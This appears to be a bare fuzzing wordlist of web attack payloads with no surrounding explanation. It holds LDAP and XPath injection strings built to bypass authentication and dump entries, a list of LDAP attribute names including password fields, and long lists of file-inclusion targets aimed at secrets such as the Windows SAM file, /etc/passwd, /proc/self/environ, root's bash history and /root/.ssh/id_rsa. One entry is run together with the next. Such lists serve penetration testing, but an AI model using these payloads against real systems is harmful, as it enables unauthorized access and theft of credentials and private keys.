%29 | |
%2A%28%7C%28mail%3D%2A%29%29 | |
%2A%28%7C%28objectclass%3D%2A%29%29 | |
%2A%7C | |
%7C | |
& | |
( | |
) | |
)(cn=))\x00 | |
*(|(mail=*)) | |
*(|(objectclass=*)) | |
*/* | |
*| | |
/ | |
// | |
//* | |
@* | |
x' or name()='username' or 'x'='y | |
| | |
*()|&' | |
admin* | |
admin*)((|userpassword=*) | |
*)(uid=*))(|(uid=* | |
c | |
cn | |
co | |
commonName | |
dc | |
facsimileTelephoneNumber | |
givenName | |
gn | |
homePhone | |
id | |
jpegPhoto | |
l | |
mobile | |
name | |
o | |
objectClass | |
ou | |
owner | |
pager | |
password | |
sn | |
st | |
surname | |
uid | |
username | |
userPassword | |
/proc/self/cmdline | |
/proc/self/stat | |
/proc/self/status | |
/proc/self/fd/0 | |
/proc/self/fd/1 | |
/proc/self/fd/2 | |
/proc/self/fd/3 | |
/proc/self/fd/4 | |
/proc/self/fd/5 | |
/proc/self/fd/6 | |
/proc/self/fd/7 | |
/proc/self/fd/8 | |
/proc/self/fd/9 | |
/proc/self/fd/10 | |
/proc/self/fd/11 | |
/proc/self/fd/12 | |
/proc/self/fd/13 | |
/proc/self/fd/14 | |
/proc/self/fd/15 | |
/proc/self/fd/16 | |
/proc/self/fd/17 | |
/proc/self/fd/18 | |
/proc/self/fd/19 | |
/proc/self/fd/20 | |
/proc/self/fd/21 | |
/proc/self/fd/22 | |
/proc/self/fd/23 | |
/proc/self/fd/24 | |
/proc/self/fd/25 | |
/proc/self/fd/26 | |
/proc/self/fd/27 | |
/proc/self/fd/28 | |
/proc/self/fd/29 | |
/proc/self/fd/30 | |
/proc/self/fd/31 | |
/proc/self/fd/32 | |
/proc/self/fd/33 | |
/proc/self/fd/34 | |
/proc/self/fd/35php://input | |
C:\boot.ini | |
C:\WINDOWS\win.ini | |
C:\WINDOWS\php.ini | |
C:\WINDOWS\System32\Config\SAM | |
C:\WINNT\php.ini | |
C:\xampp\phpMyAdmin\config.inc | |
C:\xampp\phpMyAdmin\phpinfo.php | |
C:\xampp\phpmyadmin\config.inc | |
C:\xampp\phpmyadmin\phpinfo.php | |
C:\xampp\phpmyadmin\config.inc.php | |
C:\xampp\phpMyAdmin\config.inc.php | |
C:\xampp\apache\conf\httpd.conf | |
C:\xampp\FileZillaFTP\FileZilla Server.xml | |
C:\xampp\MercuryMail\mercury.ini | |
C:\mysql\bin\my.ini | |
C:\xampp\php\php.ini | |
C:\xampp\phpMyAdmin\config.inc.php | |
C:\xampp\tomcat\conf\tomcat-users.xml | |
C:\xampp\tomcat\conf\web.xml | |
C:\xampp\sendmail\sendmail.ini | |
C:\xampp\webalizer\webalizer.conf | |
C:\xampp\webdav\webdav.txt | |
C:\xampp\apache\logs\error.log | |
C:\xampp\apache\logs\access.log | |
C:\xampp\FileZillaFTP\Logs | |
C:\xampp\FileZillaFTP\Logs\error.log | |
C:\xampp\FileZillaFTP\Logs\access.log | |
C:\xampp\MercuryMail\LOGS\error.log | |
C:\xampp\MercuryMail\LOGS\access.log | |
C:\xampp\mysql\data\mysql.err | |
C:\xampp\sendmail\sendmail.log | |
C:\apache\log\error.log | |
C:\apache\log\access.log | |
C:\apache\log\error_log | |
C:\apache\log\access_log | |
C:\apache2\log\error.log | |
C:\apache2\log\access.log | |
C:\apache2\log\error_log | |
C:\apache2\log\access_log | |
C:\log\error.log | |
C:\log\access.log | |
C:\log\error_log | |
C:\log\access_log | |
C:\apache\logs\error.log | |
C:\apache\logs\access.log | |
C:\apache\logs\error_log | |
C:\apache\logs\access_log | |
C:\apache2\logs\error.log | |
C:\apache2\logs\access.log | |
C:\apache2\logs\error_log | |
C:\apache2\logs\access_log | |
C:\logs\error.log | |
C:\logs\access.log | |
C:\logs\error_log | |
C:\logs\access_log | |
C:\log\httpd\access_log | |
C:\log\httpd\error_log | |
C:\logs\httpd\access_log | |
C:\logs\httpd\error_log | |
C:\opt\xampp\logs\access_log | |
C:\opt\xampp\logs\error_log | |
C:\opt\xampp\logs\access.log | |
C:\opt\xampp\logs\error.log | |
C:\Program Files\Apache Group\Apache\logs\access.log | |
C:\Program Files\Apache Group\Apache\logs\error.log | |
C:\Program Files\Apache Group\Apache\conf\httpd.conf | |
C:\Program Files\Apache Group\Apache2\conf\httpd.conf | |
C:\Program Files\xampp\apache\conf\httpd.conf | |
/etc/passwd | |
/etc/group | |
/etc/hosts | |
/etc/motd | |
/etc/issue | |
/etc/bashrc | |
/etc/apache2/apache2.conf | |
/etc/apache2/ports.conf | |
/etc/apache2/sites-available/default | |
/etc/httpd/conf/httpd.conf | |
/etc/httpd/conf.d | |
/etc/httpd/logs/access.log | |
/etc/httpd/logs/access_log | |
/etc/httpd/logs/error.log | |
/etc/httpd/logs/error_log | |
/etc/init.d/apache2 | |
/etc/mysql/my.cnf | |
/etc/nginx.conf | |
/opt/lampp/logs/access_log | |
/opt/lampp/logs/error_log | |
/opt/lamp/log/access_log | |
/opt/lamp/logs/error_log | |
/proc/self/environ | |
/proc/version | |
/proc/cmdline | |
/proc/mounts | |
/proc/config.gz | |
/root/.bashrc | |
/root/.bash_history | |
/root/.ssh/authorized_keys | |
/root/.ssh/id_rsa | |